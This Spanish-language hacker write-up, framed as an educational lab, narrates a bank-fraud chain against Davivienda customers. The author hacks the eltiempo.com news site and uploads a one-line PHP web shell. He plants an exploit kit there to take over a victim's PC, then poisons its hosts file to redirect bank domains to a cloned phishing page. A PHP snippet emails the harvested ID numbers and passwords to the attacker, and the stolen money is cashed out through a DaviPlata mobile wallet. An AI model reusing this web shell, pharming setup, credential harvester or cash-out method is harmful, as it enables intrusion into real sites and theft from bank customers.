Introduccin

Antes que nada dar las gracias a los lectores del anterior paper El posible inicio de un scada y por los comentarios positivos o no sobre el mismo, sus cometarios me permiten crecer y mejorar mi trabajo. En este nuevo documento intentare ser ms explcito para no generar falsas expectativas o conducir a malas interpretaciones. Quiero aclarar que lo aqu plasmado corresponde al resultado de las pruebas de laboratorio realizadas en ambientes reales. Una intrusin no es solo un cambio de un ndex, ese es solo un posible resultado, una intrusin es un arte y la intrusin no se da solo de forma tecnolgica; o por lo menos esa es mi impresin. Les recuerdo que estas pruebas se realizan con fines educativos y no como una forma de promover el delito, sino por el contrario alertar a las entidades u organizaciones sobre las vulnerabilidades y amenazas a las que estn expuestos. No es mi responsabilidad el uso que usted como lector le d a este material.

El robo del Dinero Invisible

Como cualquier colombiano que tenga dinero en un banco, puede ser vctima de un fraude y para nadie es un secreto que por la plata baila el perro y los delincuentes han evolucionado y los robos ya no se realizan con armas convencionales, sino usando los medios electrnicos y el conocimiento. Por eso el siguiente documento tiene como propsito contar la manera en la que una persona puede llegar a sacarnos esos pesos que nos ganamos con tanto sacrificio. Vale la pena aclarar que este laboratorio se realiz con cuentas propias as que las imgenes que usted ver son mas o de alguna de las personas que colaboraron en este paper, las cuales son allegadas a m, esto lo recalco por que no faltan personas malintencionadas las cuales puedan hacerme algn tipo de acusacin; simplemente quiero mostrarles como ejecutan un robo no visible y para muchos fatal financieramente hablando. Una tarde con el frio acostumbrado me reun con mi amigo navi, me comento que a un familiar suyo le haban sacado un dinero de su cuenta en el banco Davivienda, as que sin peros me sent a mirar el funcionamiento paso a paso de las transacciones de este banco para ver cmo pudo realizarse el fraude. Pens de pronto que habra sido vctima de un correo con phishing pero estaba

equivocado el familiar de Navi es un Ing. de sistemas y sabe que es phishing etc., as que le dije que me trajera el equipo donde su familiar ingresaba regularmente al sitio del banco, hice la investigacin correspondiente, mire su mquina, hice llamadas, mire log's etc. Despus de esto llegue a la siguiente teora que probamos con mi amigo Navi y que contare paso por paso.

Le dije a navi que hiciramos un laboratorio, as que lo primero que necesitbamos era la forma de propagar una infeccin en una forma que no se sospechara, como usuario normal usted confa en un sitio web serio as que todo lo comenzamos con una intrusin, lo primero era lograr entrar a un servidor con muy buen trfico as que pens en eltiempo.com, esto sera algo difcil pero no imposible as que empec la tarea. Despus de Intentar e intentar y seguir intentando Ya que no soy HACKER logre el objetivo.

Pdta.: la imagen corresponde a una consulta del trfico aproximado segn Alexa. Algunas shells ya vienen con la opcin de mirar el trfico, si no la tiene pues se programa una, simplemente es una qwery vamos que a qwery me refiero con peticin.

El Primer Objetivo estaba Listo,

Pdta.: si no le gusta la web Shell porque piensa que es muy fcil lo invito a que suba la de su gusto o si se siente ms hacker manejndola con comandos le recomiendo esta lnea... <?php system($_GET['comando']);?> si no desea en php sbala en el lenguaje que a usted del guste. En fin Me enfrente a un server que en realidad tiene un funcionamiento complejo para un usuario normal muchas virtualizaciones muchos usuarios, muchos directorios, muchos servicios y lo ms importante mucho trfico que es lo que en realidad necesitaba. Una vez ms aclarada la cuestin pase a poner el exploit kit o exploit pack si lo mismo que utilic en el anterior paper y que hace unos das se report en las bases de datos de vulnerabilidades, ya tena lista mi bot, si otra vez el malware y otra vez la intrusin que muchos critican y que imagino muchos envidian ya que no es un CTF je! Requera un host con una IP dedicada, la razn es muy sencilla, que Navi no sospechara de la IP (si se hiciera con dominios como lo hacen generalmente utilizan servidores con Cpanel, la razn este permite ver por medio de la ip el usuario un ejemplo: http://139.xxx.122.xx/~usuario), En fin hice un Wget y descargue los HTML del Banco Davivienda simulando una web como la de ellos lo que ustedes conocen como scam, pagina fake o como lo conozcan.

Pdta.: la anterior imagen muestra la web fake en un server con ip dedicada.

Estando listo le ped a Navi que ingresara a uno de los directorios en los que haba puesto el exploit, mi idea era solo probarlo con nosotros mismos por eso solo infecte un directorio de la pgina eltiempo.com la razn si lo pona en el ndex principal afectara a todo usuario que entrara a la web usando el so Windows; por lo cual le ped la IP a Navi, para saber cul era su mquina, en caso que otras personas lograran ingresar al directorio infectado, ya que el exploit infectara su mquina con tan solo entrar al directorio eltiempo.com/dirinfectado/ . Bueno la hiptesis inicial fue comprobada y el resultado fue el esperado, la mquina de Navi estaba bajo mi control; as que proced a envenenar sus DNS o hacerle el famoso pharming i . Este envenenamiento se realiza en Windows en la ruta /system32/drivers/etc/host estando all edite el archivo con algo parecido a esto: xxxxxxx http://www.davivienda.com xxxxxxx http://davivienda.com xxxxxxx https://www.davivienda.com xxxxxxx https://davivienda.com xxxxxxx davivienda.com

Tambin es necesario aclarar, que en caso de que existiera una zona en los DNS apuntando a local host, como suele suceder, era muy posible realizar un Cross Site Script, est misma funcionalidad ya viene implementada en varios sistemas de bot, engaando al navegador re direccionndolo a un servidor que se encuentra sobre la propia mquina infectada, haciendo que el navegador enve las cookies que supuestamente debe enviarle al dominio, y bajo ciertos contextos, con esto mismo, podramos rernos un poco con las cookies que tengan el flag de httponly en true. Tambin se me ocurre por ejemplo, jugar un poco con el registro para setear un proxy, y hacer que el proxy coloqu en cach algn archivo de script del sitio, as podramos mantener monitoreada la victima con el troyano en JavaScript, esta funcionalidad tambin la poseen algunas botnets, Esto es algo elemental para cualquier ama de casa, encontrarn mucha informacin en google sobre estos mtodos ;). Con esto, la recomendacin de los bancos y de las autoridades de no ingresara los portales bancarios a travs de URL que llegan en correos electrnicos queda desvirtuada; puesto que el usuario ingresa la URL del banco desde el browser y aun as, el atacante logra llevar a la vctima a donde l desea. Continuando con el laboratorio, solo restaba esperar que Navi ingresara al portal del Banco Davivienda y digitara sus datos.

Pdta.: la imagen muestra como el scam recibe los datos y los enva a un correo con un formulario programado de la siguiente forma: $Hora= date('H:i:s'); $tipo = $_POST['tipoDocumento']; $numero = $_POST['numeroDocumento']; $clave1 = $_POST['password1'];

$ip = getenv("REMOTE_ADDR"); Fecha: $Fecha / Hora: $Hora documento: $tipo ientificacin: $numero clave: $clave1 Ip Host Victima: $ip \n"; $recipient = "correo@gmail.com"; $subject = "login- $ip"; $from = "From:Davivienda - Colombia<servicio@davivienda.com>";

Pasaron unas 5 horas y por fin ingreso, el tipo me tena aburrido de esperarlo je! ya tenamos las credenciales as que lo mejor era levantar el envenenamiento para evitar que sospechara, tome el logo "a logo me refiero con los datos de la cuenta, as se le llama en el under. Ingrese al portal real del Banco Davivienda con las credenciales de Navi, lo llame y le dije lo logre, as que reunmonos de nuevo para explicarte lo realizado hasta aqu y pensar entre ambos como bamos a tener acceso al dinero,(muchos hackers diran: ya teniendo los datos eso lo hace cualquiera y sin duda se quien dir algo as como "Es SOLO UN DELINCUENTE DEFACER RAT+WEBSHELL = DINERO ME FALTO ESE CARTN") pues para l y para muchos que no lo crean si seores les falto el cartn porque si es igual a dinero, as que despus de mucho analizarlo, llegamos a la posible solucin.

Pdta.: Le recuerdo NO soy ladrn, las imgenes corresponden a la cuenta de Navi

La solucin que pensamos fue DAVIPLATA. Si DAVIPLATA, as que fuimos a un centro comercial donde reparten SIM Cards de Tigo, Claro y Movistar y pagamos 2 mil pesos por cada una, ahora necesitbamos un celular el cual nos facilit un familiar de Navi; metimos una de las sim que compramos e ingresamos a http://www.daviplata.com/, registramos el nmero, activamos el DAVIPLATA y ya estbamos listos para recibir, por lo pronto as fueran 5 centavos estara contento con el resultado, ingresamos nuevamente al portal de Davivienda, con las credenciales que ya habamos obtenido y enviamos un DAVIPLATA al nmero que inscribimos, para l envi nos pide una segunda clave esto ya lo tena estudiado as que al fake ya le haba agregado ese mdulo de peticin de la 2 password.

Pdta.: la imagen muestra l envi a nuestro celular por valor de 100.000 pesos. El sistema nos mand una clave y con eso era suficiente fuimos a un cajero, retiramos el dinero y efectivamente vulneramos nuestra propia cuenta, tenamos 100 mil pesos de la cuenta de Navi. Lo que ms nos sorprendi es que cualquier tipo comn sera capaz de lucrarse tan solo con unas horas de estudio en Google, si esto se puede lograr con una cuenta, multiplique con una buena cantidad de usuarios infectados, terrible no?. Hasta aqu llega mi investigacin y la cierro como en todos los paper que escribo, con mi opinin. Esta es una situacin crtica no solo porque el tipo de ataque afecte a servidores alternos para obtener las vctimas, sino porque se ataca una infraestructura que parece slida y que seguramente el banco culpara al usuario afectado, pero a mi modo de ver, la culpa no es solo del usuario, si no del banco, la pgina de propagacin y el server donde est el fake. Para este caso la culpa yo la repartira de la siguiente manera: 25% para eltiempo.com, ya que es vulnerable y manejando tanto trfico debera ser un poco ms seguro y no servir como intermediario para ataques. 27% el usuario, ya que siempre debe desconfiar, y aprender un poco ms sobre tecnologa para auto protegerse. 33% el banco, porque nunca valida la transaccin, as sean 5 centavos debe validarse, tambin los tips de seguridad que pregonan no son muy vlidos.

15% el server del fake, este tanto puede ser un hacked host como un server comprado as que por eso le pongo el menor porcentaje de culpa ya que cualquiera tiene acceso aun host con IP dedicada y es difcil saber qu usuario es malintencionado. Lo anterior es solo una opinin, recuerde solo es mi opinin; si tiene otras que deseara agregar lo felicito no se me ocurrieron.

Despedida Agradezco a la persona que tomo el paper de manera seria y prudente, esto es producto neto de la investigacin y que si buscara algn tipo de lucro econmico seria obvio que no lo expondra, pero siendo usuario del banco me veo en la obligacin de mostrar este laboratorio y recordndole a cada uno de ustedes que no es este el nico banco ni el nico pas que sufre por estos ataques, muchos dirn ya saba es bsico, otros se sorprendern y a otros les dar igual as que para cada uno de los anteriores mis saludos si les gusto bien si no le gusto no creo que hubieran llegado hasta aqu xD pero igual gracias , espero esto produzca lo que deseo y es el no comer completo lo que nos hablan, siempre puede ser posible cualquier cosa solo que criticamos de manera destructiva las cosas que no conocemos o creemos que somos los nicos que las sabemos .

D4NB4R

https://poisonsecurity.wordpress.com/ Greetz: Navi muchas gracias por ayudarme en esta investigacin al resto de mis amigos un saludo. A mi esposa gracias por ayudarme y apoyarme en los laboratorios realizados. Aku gracias por tu edicin y publicacin. "El hacking es una cultura un estilo de vida un pensamiento, no una moda" @d4nb4r
i

Pharming es la explotacin de una vulnerabilidad en el software de los servidores DNS (Domain Name System) o en el de los equipos de los propios usuarios, que permite a un atacante redirigir un nombre de dominio (domain name) a otra mquina distinta. De esta forma, un usuario que introduzca un determinado nombre de dominio que haya sido redirigido, acceder en su explorador de internet a la pgina web que el atacante haya especificado para ese nombre de dominio. Tomado de Wikipedia